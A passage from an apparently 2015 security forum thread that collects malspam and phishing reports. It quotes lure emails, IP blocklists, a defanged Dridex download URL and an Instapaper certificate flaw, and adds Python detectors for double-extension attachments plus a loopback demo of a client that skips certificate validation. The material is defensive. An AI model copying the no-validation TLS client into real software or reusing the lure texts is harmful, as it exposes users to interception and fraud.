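EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs"}
# Extensions a user expects to be a harmless document, image or archive.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt", "zip"}
SIZE_TOKEN = re.compile(r"size=(\d+)")


def name_findings(filename: str) -> list[str]:
    """Return the reasons (if any) that a filename looks like a malspam lure."""
    findings: list[str] = []
    exts = filename.lower().split(".")[1:]
    if exts and exts[-1] in EXECUTABLE_EXTS:
        findings.append(f"executable extension .{exts[-1]}")
        if len(exts) >= 2 and exts[-2] in DECOY_EXTS:
            findings.append(f"double extension .{exts[-2]}.{exts[-1]} (icon spoof)")
    if SIZE_TOKEN.search(filename):
        findings.append("size= token embedded in filename (malformed archive name)")
    if filename.lower().count(".zip") > 1:
        findings.append(".zip occurs more than once in filename")
    return findings


def declared_size(filename: str) -> int | None:
    """Byte count a malformed name claims for itself, or None if absent."""
    m = SIZE_TOKEN.search(filename)
    return int(m.group(1)) if m else None


def inspect_attachment(filename: str, data: bytes) -> dict:
    """Combine the name checks with a look inside the archive, if it is one."""
    report = {
        "name_findings": name_findings(filename),
        "declared_size": declared_size(filename),
        "actual_size": len(data),
        "size_matches": None,        # None when the name carries no size= token
        "executables_inside": [],
        "valid_zip": False,
    }
    if report["declared_size"] is not None:
        report["size_matches"] = report["declared_size"] == len(data)
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            report["valid_zip"] = True
            for member in zf.namelist():
                if member.lower().rsplit(".", 1)[-1] in EXECUTABLE_EXTS:
                    report["executables_inside"].append(member)
    except zipfile.BadZipFile:
        pass  # not an archive: the name checks alone decide
    return report


def verdict(report: dict) -> str:
    """'block' for an executable lure, 'review' for other oddities, else 'pass'."""
    if report["executables_inside"] or any("executable" in f for f in report["name_findings"]):
        return "block"
    if report["name_findings"]:
        return "review"
    return "pass"


def build_sample() -> tuple[str, bytes]:
    """Constructed sample: a ZIP whose name carries a size= token equal to its
    real length and which holds a PDF-lookalike .exe made of placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Receipt99704.PDF.exe", b"placeholder bytes, not an executable\n")
    data = buf.getvalue()
    name = f"instructions.zip size={len(data)}.zipsize={len(data)}"
    return name, data


if __name__ == "__main__":
    fn, blob = build_sample()
    rep = inspect_attachment(fn, blob)
    print(fn, rep, verdict(rep))
```

Checking the declared size against the real one is what confirms the name is the deliberate malformation described above rather than an accident, and looking inside the archive catches the .PDF.exe even when the outer name is unremarkable.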
AplusWebMaster
2015-06-23, 17:05
FYI...
Fake 'list of missing documents' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/06/malware-spam-hope-this-e-mail-finds-you.html
23 June 2015 - "This spam comes with a malicious attachment:
Date: 23 June 2015 at 14:14
Subject: Hope this e-mail finds You well
Good day!
Hope this e-mail finds You well.
Please be informed that we received the documents regarding the agreement No. 7232-003 dated from 3rd day of June.
However there are some forms missing.
We made the list of missing documents for Your ease (the list is attached below).
Please kindly check whether these forms are kept in your records.
In case you have any questions here are our contact details: 838-72-99. Feel free to give a call at any time.
Stacey Grimly,
Project Manager
Some of the details vary in each email, but the overall format is the same. So far I have seen two different mis-named attachments:
check.zip size=57747.zip size=57747
check.zip size=57717.zip size=57717
The file sizes actually -match- the one listed in the file's name. Because the attachment is not properly named, some ZIP file handlers may fail to deal with them. Equally, the technique may be designed to get the spam past mail filters. Each archive contains a file info_bank_pdf.exe with different checksums and a detection rate of 3/52* or 3/54**. Automated analysis tools... indicate traffic to the following locations:
93.93.194.202 (Orion Telekom, Serbia)
173.216.240.56 (Suddenlink Communications, US)
188.255.169.176 (Orion Telekom, Serbia)
68.190.246.142 (Charter Communications, US)
... Malwr reports... show dropped files named yaxkodila.exe (two versions, VT 5/54*** and 5/55****) plus a file jieduk.exe (VT 8/54)[5].... the VirusTotal analysis also throws up another IP address of: 104.174.123.66 (Time Warner Cable, US). The malware is a common combination of the Upatre downloader and Dyre banking trojan, targeting Windows systems.
Recommended blocklist:
93.93.194.202
173.216.240.56
188.255.169.176
68.190.246.142
104.174.123.66 "
* https://www.virustotal.com/en/file/f2b234b32d236f6114d87e511d7ecbd79ff6ae9b8254f461b48fcfeacf7628d9/analysis/1435063484/
** https://www.virustotal.com/en/file/4117f1a06cde3c01e1e51cecc83689c4ecd93ca49242589cabd57b06a39ecb71/analysis/1435063502/
*** https://www.virustotal.com/en/file/c4c64494b037d8af97f877760453fc87a980413573b760f284a5f42cbcf5ed49/analysis/1435064473/
**** https://www.virustotal.com/en/file/56a36f30bed8b6442ed3703dfcdd7541bd492d641a664472a0cb2e77ed424ccb/analysis/1435064478/
[5] https://www.virustotal.com/en/file/df66805b40483140f6628286932b8e5f0cf0ba2424c4afefa53f4d09175453d5/analysis/1435064476/
- http://myonlinesecurity.co.uk/hope-this-e-mail-finds-you-well-stacey-grimly-fake-pdf-malware/#
23 June 2015
- https://www.virustotal.com/en-gb/file/b4d82284af687ee85559c557dbc8a70cf8df43db5f4e821714dc0885ac4dd8cd/analysis/1435062320/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
72.230.82.80: https://www.virustotal.com/en-gb/ip-address/72.230.82.80/information/
___
Fake 'Agreement' SPAM – PDF malware
- http://myonlinesecurity.co.uk/agreement-fake-pdf-malware/
23 June 2015 - "'Agreement' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Hello,
As per your question please find attached the application form.
Please fill out each detail and returnit back to us via emailsoon as possibleWith this information we will be able to help you resolve this issue.
Thank you.
23 June 2015: new_filling_form.zip: Extracts to: new_application_form.exe
Current Virus total detections: 10/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/20f3aea8e8a3d7ce70f04465ddb0688e5ed4aef89a424c7e83e4c37c84dbe83c/analysis/1435078814/
... Behavioural information
TCP connections
104.238.141.75: https://www.virustotal.com/en-gb/ip-address/104.238.141.75/information/
93.93.194.202: https://www.virustotal.com/en-gb/ip-address/93.93.194.202/information/
216.254.231.11: https://www.virustotal.com/en-gb/ip-address/216.254.231.11/information/
:fear: :mad:
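Added example (mine, not code from dynamoo or myonlinesecurity): a stdlib-only Python triage for the two tricks in the posts above, the mis-named "check.zip size=NNNNN.zip" attachment whose embedded size is checked against the real payload, and the PE file inside the archive named so that it looks like a PDF (info_bank_pdf.exe, new_application_form.exe) when known extensions are hidden. Archives are recognised by magic bytes rather than extension, so renaming the ZIP does not dodge the check. The .eml it runs on is constructed inline to match the sample; the sender and recipient addresses are assumed.

```python
from __future__ import annotations

import email
import email.policy
import io
import re
import zipfile
from email.message import EmailMessage

PE_MAGIC = b"MZ"
ZIP_MAGIC = b"PK\x03\x04"
EXEC_EXTS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs")
SIZE_IN_NAME = re.compile(r"size=(\d+)", re.IGNORECASE)
MAX_MEMBER = 50 * 1024 * 1024  # never inflate a member larger than this (zip-bomb guard)


def triage_attachment(name: str, data: bytes) -> list[str]:
    """Return findings for one attachment (or one archive member)."""
    findings: list[str] = []
    lname = name.lower()

    # 1. A filename that carries its own size, as in 'check.zip size=57747.zip'.
    m = SIZE_IN_NAME.search(lname)
    if m:
        claimed = int(m.group(1))
        verdict = "matches" if claimed == len(data) else f"differs from {len(data)}"
        findings.append(f"filename embeds size={claimed} ({verdict} actual size)")

    # 2. Name and content disagreeing: what the 'PDF icon on an .exe' trick relies on.
    if lname.endswith(EXEC_EXTS) and "pdf" in lname:
        findings.append("executable named to look like a PDF")
    if data.startswith(PE_MAGIC) and not lname.endswith(EXEC_EXTS):
        findings.append("PE executable with a non-executable extension")

    # 3. Archives are recognised by magic, not by extension, and every member is triaged.
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    if info.file_size > MAX_MEMBER:
                        findings.append(f"{info.filename}: skipped, {info.file_size} bytes")
                        continue
                    member = zf.read(info.filename)
                    if member.startswith(PE_MAGIC):
                        findings.append(f"{info.filename}: contains PE executable ({len(member)} bytes)")
                    findings.extend(f"{info.filename}: {f}" for f in triage_attachment(info.filename, member))
        except zipfile.BadZipFile:
            findings.append("ZIP magic but archive does not parse")
    return findings


def triage_eml(raw: bytes) -> dict[str, list[str]]:
    """Map each attachment filename in a raw RFC 822 message to its findings."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    report: dict[str, list[str]] = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        payload = part.get_payload(decode=True) or b""
        report[name] = triage_attachment(name, payload)
    return report


def build_sample_eml() -> bytes:
    """Constructed sample shaped like the 'Hope this e-mail finds You well' run; not a real capture."""
    fake_exe = PE_MAGIC + b"\x00" * 510  # a PE header stub, enough for the magic check
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("info_bank_pdf.exe", fake_exe)
    zip_bytes = buf.getvalue()

    msg = EmailMessage()
    msg["From"] = "Stacey Grimly <stacey@sender.invalid>"  # assumed address
    msg["To"] = "victim@recipient.invalid"                 # assumed address
    msg["Subject"] = "Hope this e-mail finds You well"
    msg.set_content("We made the list of missing documents for Your ease (the list is attached below).")
    msg.add_attachment(zip_bytes, maintype="application", subtype="zip",
                       filename=f"check.zip size={len(zip_bytes)}.zip")
    return bytes(msg)


if __name__ == "__main__":
    for attachment, notes in triage_eml(build_sample_eml()).items():
        print(attachment)
        for note in notes:
            print("  -", note)
```

Feed it a real message with `triage_eml(open("sample.eml", "rb").read())`; anything that reports a PE member, a PDF-looking executable, or a size claim is worth quarantining before a user ever sees the icon.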
AplusWebMaster
2015-06-24, 15:38
FYI...
Fake 'Hilton Hotels' SPAM – PDF malware
- http://myonlinesecurity.co.uk/a-for-guest-warde-said-hilton-hotels-fake-pdf-malware/
24 June 2015 - "'A for guest WARDE SAID' pretending to come from CTAC_DT_Hotel@ Hilton .com with a zip attachment is another one from the current bot runs... The email looks like:
Thank you for choosing our hotel and we very much hope that you enjoyed your stay with us.
Enclosed is a copy of your receipt(FOLIODETE_9601395.pdf). Should you require any further assistance please do not hesitate to contact us directly.
We look forward to welcoming you back in the near future.
This is an automatically generated message. Please do not reply to this email address...
24 June 2015: FOLIODETE_9601395.zip: Extracts to: FOLIODETE_2015_0006_0024.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/6e8cc3ac898a72b83ae53ec1da6e93e2fa9c144a332bc67df87a2c5fdc55b848/analysis/1435142883/
___
Fake 'Considerable law alternations' SPAM - malicious payload
- http://blog.dynamoo.com/2015/06/malware-spam-considerable-law.html
24 June 2015 - "This -fake- legal spam comes with a malicious payload:
Date: Wed, 24 Jun 2015 22:04:09 +0900
Subject: Considerable law alternations
Pursuant to alternations made to the Criminal Code securities have to be reestimated.
Described proceeding is to finish until April 2016.
However shown levy values to be settled last in this year.
Please see the documents above .
Pamela Adams
Chief accountant
In the sample I saw there was an attachment named excerptum_from_the_implemented_rule.zip containing a malicious executable excerptum_from_the_implemented_act.exe which has a VirusTotal detection rate of 2/55*. Automated analysis tools... show malicious traffic to the following IPs:
93.185.4.90 (C2NET Przno, Czech Republic)
216.16.93.250 (Clarity Telecom LLC / PrairieWave, US)
195.34.206.204 (Radionet, Ukraine)
75.98.158.55 (Safelink Internet , US)
185.47.89.141 (Orion Telekom, Serbia)
83.168.164.18 (SWAN, a.s. TRIO network, Slovakia)
85.192.165.229 (Rostelecom / VolgaTelecom, Russia)
178.222.250.35 (Telekom Srbija, Serbia)
The Malwr report and Hybrid Analysis report indicate a couple of dropped files, gebadof.exe (VT 2/55**) and qppwkce.exe (VT 3/55***). This malware appears to be a combination of the Upatre downloader and Dyre banking trojan.
Recommended blocklist:
93.185.4.90
216.16.93.250
195.34.206.204
75.98.158.55
185.47.89.141
83.168.164.18
85.192.165.229
178.222.250.35 "
* https://www.virustotal.com/en/file/63127664ca7015ff7eafc82d8f37a38a97e5537995742cdbf8d63a8e91f490e6/analysis/1435151345/
** https://www.virustotal.com/en/file/63127664ca7015ff7eafc82d8f37a38a97e5537995742cdbf8d63a8e91f490e6/analysis/1435153236/
*** https://www.virustotal.com/en/file/572606aa9bbc705457e1d35d4823b1c25b8b561a01dd2018dc7f94577b86c13f/analysis/1435153268/
___
Fake Bank of America Twitter Feed Leads to Phish ...
- https://blog.malwarebytes.org/fraud-scam/2015/06/fake-bank-of-america-twitter-feed-leads-to-phishing-page/
June 24, 2015 - "Over the last day or so, a Twitter feed claiming to be a support channel for Bank of America has been sending links and messages to anybody having issues with their accounts. Here’s the dubious BoA Twitter account in question:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed1.jpg
... In most cases, they direct people to a URL where they can supposedly fix their problems, which is
sclgchl1(dot)eu(dot)pn/index(dot)html
They’ve also been seen asking for credentials directly via DM (Direct Message). They appear to be using that classic Twitter -phishing- technique: look for people sending help messages to an official account, then inject themselves into the conversation:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed2.jpg
Here’s a sample list of messages they’ve been sending to BoA customers:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitterstorm.jpg
Some things to note: the Twitter account is -not- verified, and the page collecting personal information is not HTTPS secured which is never a good sign where sending banking credentials to someone is concerned. If you land on their page with JavaScript disabled, you’ll be asked to switch it on again:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed3.jpg
The site asks for the following information: Online ID, Passcode, Account Number, Complete SSN or Tax Identification Number and Passcode. Once all of this information is entered, the victim is redirected to the real Bank of America website... At time of writing, the site is being flagged by Chrome for phishing:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed7.jpg
We’ve also spotted another page on the same domain which looks like a half-finished Wells Fargo “Security Sign On” page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/06/boatwitfeed8.jpg
We advise customers of BoA to be very careful where they’re sending account credentials – note that the official BoA Twitter feed has a -Verified- icon, and that small but crucial detail could make all the difference where keeping your account secure is concerned."
sclgchl1(dot)eu(dot)pn: 83.125.22.211: https://www.virustotal.com/en-gb/ip-address/83.125.22.211/information/
___
Samsung laptops deliberately disable Windows Update with bloatware
- http://www.theinquirer.net/inquirer/news/2414698/samsung-laptops-deliberately-disable-windows-update-with-bloatware
Jun 24 2015 - "... Samsung, in common with a number of manufacturers, has an app for finding the latest drivers and updates to, well, frankly, bloatware. In Samsung's case the app is called SW Updater. Samsung describes it thus: 'Find easy ways to install and maintain the latest software, protect your computer, and back up your music, movies, photos and files'... a teardown from Microsoft MVP Patrick Barker* has revealed that Samsung laptops -include- an executable file called Disable_Windowsupdate.exe which kind of explains itself really. What's really disturbing about this, as if it wasn't enough already, is that if you turn Windows Update back on, SW Updater goes back and turns it back -off- again..."
* http://bsodanalysis.blogspot.in/2015/06/samsung-deliberately-disabling-windows.html
- http://www.neowin.net/news/samsung-cripples-windows-update-to-help-your-settings
Jun 24, 2015
___
Instapaper App vulnerable to Man-in-the-Middle Attacks
- http://labs.bitdefender.com/2015/06/android-instapaper-app-vulnerable-to-man-in-the-middle-attacks/
June 23, 2015 - "... analyzed popular Android app Instapaper and found it can be vulnerable to man-in-the-middle attacks that could expose users’ signup/login credentials when they try to log in into their accounts. The vulnerability may have serious consequences, especially if users have the same password for more than one account, leaving them potentially vulnerable to intrusions.
The Problem: Instapaper allows users to save and store articles for reading, particularly for when they’re offline, on the go, or simply don’t have access to the Internet. The application works by saving most web pages as text only and formatting their layout for tablets or phone screens. Everyone who wants to use the application is required to sign-up and create an account to check out notes, liked articles or access other options. However, the vulnerability lies not in the way the application fetches content, but in the way it implements (or in this case, doesn’t implement) certificate validation. Although the entire communication is handled via HTTPS, the app performs no certificate validation. If someone were to perform a man-in-the-middle attack, he could use a self-signed certificate and start “communicating” with the application...
The Attack: If a user were to sign into his account while connected to a Wi-Fi network that’s being monitored by an attacker, his authentication credentials (both username and password) could easily be intercepted using any fake certificate and a traffic-intercepting tool...
Implications: While the attacker might seem to only gain access to your Instapaper account, most people use the same password for multiple accounts. A cybercriminal could try and use your Instapaper password to access your social media or email accounts. Studies have shown that more than 50% of users reuse the same password, so the chances are -better- than even that more than one account could be vulnerable if your Instapaper credentials have been stolen. We have notified the development team behind the Android Instapaper app about the found vulnerability, but they have yet to confirm when a fix will become available..."
___
SEC hunts hacks who stole corp emails to trade stocks
- http://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623
Jun 23, 2015 - "U.S. securities regulators are investigating a group of hackers suspected of breaking into corporate email accounts to steal information to trade on, such as confidential details about mergers, according to people familiar with the matter. The Securities and Exchange Commission has asked at least eight listed companies to provide details of their data breaches, one of the people said. The unusual move by the agency reflects increasing concerns about cyber attacks on U.S. companies and government agencies. It is an "absolute first" for the SEC to approach companies about possible breaches in connection with an insider trading probe, said John Reed Stark, a former head of Internet enforcement at the SEC. "The SEC is interested because failures in cybersecurity have prompted a dangerous, new method of unlawful insider trading," said Stark, now a private cybersecurity consultant. According to people familiar with the matter, the SEC's inquiry and a parallel probe by the U.S. Secret Service - which investigates cyber crimes and financial fraud - were spurred by a December report by security company FireEye Inc about a sophisticated hacking group that it dubbed 'FIN4'. Since mid-2013, FIN4 has tried to hack into email accounts at more than 100 companies, looking for confidential information on mergers and other market-moving events. The targets include more than 60 listed companies in biotechnology and other healthcare-related fields, such as medical instruments, hospital equipment and drugs, according to the FireEye report*..."
* https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
Nov 30, 2014
- http://www.reuters.com/video/2015/06/23/exclusive-sec-hunts-corporate-hackers?videoId=364704066&newsChannel=cyber-crime
Video 2:08
:fear::fear: :mad:
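Added example, not code from Bitdefender or Instapaper: what "no certificate validation" buys an attacker, reproduced locally in Python. It generates a throwaway self-signed certificate with the openssl command-line tool (assumed to be installed), serves it on loopback under the assumed hostname mitm.example, and connects three clients to it: a trust-everything client (the behaviour described for the app), the stock validating client, and a leaf-certificate pinning client that checks the SHA-256 fingerprint of the presented certificate before sending a single byte. Only the first one hands its traffic to the fake certificate.

```python
from __future__ import annotations

import hashlib
import os
import socket
import ssl
import subprocess
import tempfile
import threading

HOST = "127.0.0.1"
SNI = "mitm.example"  # assumed hostname for the demo, not a real host


def make_self_signed_cert(directory: str) -> tuple[str, str]:
    """Create the 'attacker's' self-signed certificate with the openssl CLI (assumed present)."""
    cert = os.path.join(directory, "cert.pem")
    key = os.path.join(directory, "key.pem")
    subprocess.run(
        ["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes", "-days", "1",
         "-subj", f"/CN={SNI}", "-keyout", key, "-out", cert],
        check=True, capture_output=True,
    )
    return cert, key


def cert_fingerprint(cert_path: str) -> str:
    """SHA-256 over the DER certificate: the value a pinning client would ship with."""
    with open(cert_path) as fh:
        der = ssl.PEM_cert_to_DER_cert(fh.read())
    return hashlib.sha256(der).hexdigest()


def start_tls_server(cert: str, key: str) -> tuple[socket.socket, int]:
    """Minimal TLS server playing the man-in-the-middle; answers one request per connection."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert, key)
    listener = socket.socket()
    listener.bind((HOST, 0))
    listener.listen(8)

    def serve() -> None:
        while True:
            try:
                conn, _ = listener.accept()
            except OSError:  # listener closed: shut down
                return
            try:
                with ctx.wrap_socket(conn, server_side=True) as tls:
                    tls.recv(1024)
                    tls.sendall(b"HTTP/1.0 200 OK\r\n\r\nsecret\n")
            except (ssl.SSLError, OSError):
                pass  # the client refused our certificate or hung up

    threading.Thread(target=serve, daemon=True).start()
    return listener, listener.getsockname()[1]


def trusting_context() -> ssl.SSLContext:
    """What an app that performs no certificate validation effectively does."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def fetch(ctx: ssl.SSLContext, port: int, expected_pin: str | None = None) -> str:
    """Return 'connected' or 'rejected'. With a pin, the leaf is checked before any data is sent."""
    try:
        with socket.create_connection((HOST, port), timeout=5) as raw:
            with ctx.wrap_socket(raw, server_hostname=SNI) as tls:
                if expected_pin is not None:
                    # binary_form=True returns the DER leaf even when the chain was not validated
                    got = hashlib.sha256(tls.getpeercert(binary_form=True)).hexdigest()
                    if got != expected_pin:
                        return "rejected"
                tls.sendall(b"GET / HTTP/1.0\r\n\r\n")
                tls.recv(1024)
                return "connected"
    except ssl.SSLError:  # includes SSLCertVerificationError
        return "rejected"


def run_demo() -> dict[str, str]:
    with tempfile.TemporaryDirectory() as tmp:
        cert, key = make_self_signed_cert(tmp)
        pin = cert_fingerprint(cert)
        listener, port = start_tls_server(cert, key)
        try:
            return {
                # vulnerable app: any certificate is accepted, credentials go to the MITM
                "no_validation": fetch(trusting_context(), port),
                # stock validation: a self-signed certificate is not trusted
                "default_validation": fetch(ssl.create_default_context(), port),
                # pinning: chain checks are off, but the leaf must be the expected one ...
                "pinned_correct": fetch(trusting_context(), port, expected_pin=pin),
                # ... so any other certificate, the MITM's included, is refused
                "pinned_wrong": fetch(trusting_context(), port, expected_pin="00" * 32),
            }
        finally:
            listener.close()


if __name__ == "__main__":
    for client, outcome in run_demo().items():
        print(f"{client:20s} {outcome}")
```

The "pinned" client deliberately turns off chain validation and then verifies the leaf itself; in a production client you would keep chain validation on as well and pin the SubjectPublicKeyInfo rather than the whole certificate, so that a routine renewal does not break the app.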
AplusWebMaster
2015-06-25, 15:55
FYI...
Dyre emerges as main financial Trojan threat
- http://www.theregister.co.uk/2015/06/25/dyre_banking_vxers_love_mondays_symantec_says/
25 Jun 2015 - "... the masterminds behind the Dyre banking malware are putting in full five-day working weeks to maintain some -285- command and control servers handling stolen banking credentials. The malware is one of the worst in circulation using its fleet of command and control servers to handle the reams of bank account data blackhats steal using phishing websites. Symantec says* the attacks are confined largely to Europe outside of Russia and Ukraine where most of the command and control servers are located..."
* http://www.symantec.com/connect/app#!/blogs/dyre-emerges-main-financial-trojan-threat
23 Jun 2015 - "... After a number of recent takedowns against major financial threats such as Gameover Zeus, Shylock, and Ramnit, the threat posed by these groups has receded but Dyre has taken their place as one of the main threats to ordinary consumers. Detected by Symantec as Infostealer.Dyre, Dyre targets Windows computers and can steal banking and other credentials by attacking all three major web browsers (Internet Explorer, Chrome, and Firefox). Dyre is a two-pronged threat. Aside from stealing credentials, it can also be used to infect victims with other types of malware, such as adding them to -spam- botnets... the number of Dyre infections began to surge a year ago and the attackers behind this malware have steadily improved its capabilities and continued to build out supporting infrastructure:
Dyre detections over time:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_24.png
... Dyre is mainly spread using spam emails. In most cases the emails masquerade as businesses documents, voicemail, or fax messages. If the victim clicks-on-an-email’s-attachment, they are -redirected- to a malicious website which will install the Upatre downloader on their computer... In many cases, the victim is added to a -botnet- which is then used to power further spam campaigns and infect more victims..."
>> https://www.symantec.com/connect/sites/default/files/users/user-2598031/dyre-infographic_1.jpg
___
Web security subtleties and exploitation of combined vulnerabilities
- https://isc.sans.edu/diary.html?storyid=19837
2015-06-25 - "The goal of a penetration test is to report all identified vulnerabilities to the customer. Of course, every penetration tester puts most of his effort into finding critical security vulnerabilities: SQL injection, XSS and similar, which have the most impact for the tested web application... what we exploit with the XSS vulnerability in the first place: typically the attacker tries to steal cookies in order to gain access to the victim’s session. Since here sessions are irrelevant, the attacker will not use XSS to steal cookies but instead to change what the web page displays to the victim. This can be used for all sorts of -phishing- exploits and, depending on the URL and context of the attack, can be even more devastating than stealing the sessions."
(More detail at the isc URL above.)
___
Fraud Alert Issued on Business Email Compromise Scam
- https://www.us-cert.gov/ncas/current-activity/2015/06/24/Fraud-Alert-Issued-Business-Email-Compromise-Scam
June 24, 2015 - " The Financial Services Information Sharing and Analysis Center (FS-ISAC) and federal law enforcement agencies have released a joint alert warning companies of a sophisticated wire payment scam referred to as business email compromise (BEC). Scammers use fraudulent information to trick companies into directing financial transactions into accounts scammers control. Users and administrators are encouraged to review the BEC Joint Report (link is external*) for details and refer to the US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* https://www.fsisac.com/sites/default/files/news/BEC_Joint_Product_Final.pdf
** https://www.us-cert.gov/ncas/tips/ST04-014
"... Do not give sensitive information to anyone unless you are sure that they are indeed who they claim to be and that they should have access to the information..."
- http://blogs.cisco.com/security/talos/hook-line-sinker#more-172509
June 24, 2015 - "... Attackers are constantly targeting user data and attempting to trick users into leaking sensitive information through phishing campaigns. These phishing attempts are targeting normal users who represent the customers of the various businesses being targeted. If the emails come through a work email, the user can take advantage of a layered approach to security that will usually indicate these attacks as spam or even malicious. Most home users, however, do not have the same layered security configuration on their home networks. Many of these phish also attempt to try to place time pressure on the user to get them to act quickly and without taking the time to think about what they are doing. Therefore, it is important for users to be constantly vigilant, and to remain -calm- when they receive that cleverly crafted phishing email. Users should always take time to think -before- revealing any sensitive information, whether it is on the phone, via email, or through the web..."
:fear::fear: :mad:
AplusWebMaster
2015-06-26, 16:07
FYI...
Fake 'Xerox Scan' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/scanned-from-a-xerox-multifunction-printer-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2015 - "'Scanned from a Xerox Multifunction Printer' pretending to come from Xerox (random number) @ your own email domain with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please open the attached document. It was scanned and sent to you using a Xerox Multifunction Printer.
Attachment File Type: DOC, Multi-Page
Multifunction Printer Location:
Device Name: XRX9C934E5EEC46 ...
26 June 2015: Scanned from a Xerox Multifunction Printer.doc
Current Virus total detections: 4/56* ... downloads Dridex banking malware from http ://sudburyhive .org/708/346.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/25e247c71cd4a50f5c97e3b69807faa5ac048da050c0180fd881f75d1577fe66/analysis/1435301557/
** https://www.virustotal.com/en-gb/file/2841f3dec7a4485ca6efde0fac2863f9e3ec0af62f7e36e6f835d57e327a4b93/analysis/
... Behavioural information
TCP connections
68.169.49.213: https://www.virustotal.com/en-gb/ip-address/68.169.49.213/information/
88.221.15.80: https://www.virustotal.com/en-gb/ip-address/88.221.15.80/information/
sudburyhive .org: 104.27.172.61: https://www.virustotal.com/en-gb/ip-address/104.27.172.61/information/
104.27.173.61: https://www.virustotal.com/en-gb/ip-address/104.27.173.61/information/
___
Fake 'Vehicle Tax' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/notification-of-vehicle-tax-dd-payment-schedule-ref-000000-000005-274421-001-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2015 - "'Notification of Vehicle Tax DD Payment Schedule (Ref: 000000-000005-274421-001)' pretending to come from directdebit@ taxdisc.service .gov .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Important: Confirmation of your successful
Direct Debit instruction
Dear customer
Vehicle registration number: FG08OEE
Thank you for arranging to pay the vehicle tax by Direct Debit.
Please can you check that the details attached below, and your payment schedule are correct.
If any of the above financial details are incorrect please contact your bank as soon as possible.
However, if your details are correct you don’t need to do anything and your Direct Debit will be
processed as normal. You have the right to cancel your Direct Debit at any time. A copy of the
Direct Debit Guarantee is included with this letter.
For your information, the collection will be made using this reference, and this is how your
payment will be detailed on your bank statements:
DVLA Identifier: 295402
Reference: FG08OEE
Your vehicle tax will automatically renew unless you notify us of any changes. We will send a new
payment schedule at the time of renewal.
Yours sincerely
Rohan Gye
Vehicles Service Manager
Driver a& Vehicle Licencing Agency logo
26 June 2015 : FG08OEE.doc - Current Virus total detections: 4/55* . This downloads the same Dridex banking malware in exactly the -same- way as today’s other malspam word macro downloader 'Scanned from a Xerox Multifunction Printer' – word doc or excel xls spreadsheet malware** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en-gb/file/404a73f3cb148dfdd1e75aa498c7a8098352f4014eedf50c77db2c299bf70f24/analysis/1435304855/
** http://myonlinesecurity.co.uk/scanned-from-a-xerox-multifunction-printer-word-doc-or-excel-xls-spreadsheet-malware/
- http://blog.dynamoo.com/2015/06/malware-spam-notification-of-vehicle.html
26 June 2015
werktuigmachines .be: 46.30.212.5: https://www.virustotal.com/en-gb/ip-address/46.30.212.5/information/
___
Fake 'Order Confirmation' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/order-confirmation-ret-385236-250615-royal-canin-word-doc-or-excel-xls-spreadsheet-malware/
26 June 2015 - "'Order Confirmation RET-385236 250615' pretending to come from [1NAV PROD RCS] <donotreply@ royal-canin .fr> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
[Garbled text in body]... When it is repaired it then reads:
Please find attached your Sales Order Confirmation
Note: This e-mail was sent from a notification only e-mail address that
cannot accept incoming e-mail. PLEASE DO NOT REPLY TO THIS MESSAGE.
This has an attachment as described below:
25 February 2015: Order Confirmation RET-385236 250615.doc - Current Virus total detections: 4/56*
